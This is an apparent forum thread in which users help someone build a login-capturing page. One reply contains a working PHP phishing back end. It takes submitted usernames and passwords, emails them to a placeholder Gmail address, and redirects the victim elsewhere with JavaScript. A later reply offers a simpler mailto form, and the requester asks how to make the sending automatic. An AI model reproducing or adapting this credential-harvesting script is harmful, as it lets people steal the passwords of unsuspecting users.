Originally posted by: gigapet
how much are you paying?
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>title</title>
</head>
<body>
<?php
print "<script>";
print " self.location='http://REDIRECT THEM AFTERWARDS TO HERE';";
print "</script";
//begin mail stuff
$msg = "Username: $_POST[username]\n";
$msg .= "Password: $_POST[password]\n";
//mail properties
$recipient = "YOUR@gmail.com";
$subject = "Submission";
$mailheaders = "From: Myself <me@home.pc> \n";
$mailheaders .= "Reply-to:YOUR@gmail.com";
//send it!
mail($recipient, $subject, $msg, $mailheaders);
?>
</body>
</html>
Originally posted by: alfa147x
Software forum isn't fast enough... I'd get a quicker response from ATOT
here it is!
C'mon people!!!!
Originally posted by: Legendary
If you go to high school (my guess), don't do it for free.
If you go to college, your IT guy should be able to do it himself.
Either way, just stop what you're doing right now.
On the other hand:
<form action=mailto:your@email.com>
<textarea name=info>Your user will type here</textarea>
<input type=submit>
</form>
I think that should work.
Originally posted by: alfa147x
Is it possible that the script sends it automaticly with out using some thing outlook?